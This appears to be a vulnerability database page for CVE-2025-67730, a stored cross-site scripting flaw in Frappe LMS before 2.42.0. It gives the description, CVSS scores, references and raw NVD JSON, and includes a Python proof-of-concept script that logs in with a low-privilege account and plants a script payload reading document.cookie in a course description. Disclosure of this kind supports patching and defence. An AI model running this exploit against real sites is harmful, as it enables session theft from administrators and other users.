CVE-2025-67730

Description

Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE

Frappe LMS < 2.42.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2025-67730 PoC - Stored XSS in Frappe LMS # Target: Frappe LMS < 2.42.0 base_url = "https://target-site.com" login_url = f"{base_url}/api/method/login" xss_payload = "<script>alert(document.cookie)</script>" session = requests.Session() # Step 1: Login with low-privilege account login_data = { "usr": "[email protected]", "pwd": "password123" } response = session.post(login_url, json=login_data) # Step 2: Create Course with XSS payload in description course_url = f"{base_url}/api/method/lms.lms.doctype.course.course" course_data = { "title": "Malicious Course", "description": xss_payload, "course_template": "", "enable_legacy_link": False } response = session.post(course_url, json=course_data) # Step 3: When admin views the course, XSS executes print("XSS payload injected successfully") print("Wait for admin to view the course page") # Cleanup: Delete the malicious course course_name = response.json().get("data", {}).get("name") delete_url = f"{base_url}/api/method/frappe.client.delete" session.post(delete_url, json={"doctype": "Course", "name": course_name})

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67730
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67730
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67730/
[4] VulDB https://vuldb.com/cve/CVE-2025-67730
[5] https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c
[6] https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67730", "sourceIdentifier": "[email protected]", "published": "2025-12-12T08:15:48.210", "lastModified": "2025-12-15T17:27:21.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.42.0", "matchCriteriaId": "E8908A38-7B64-4B77-9423-86532826C317"}]}]}], "references": [{"url": "https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}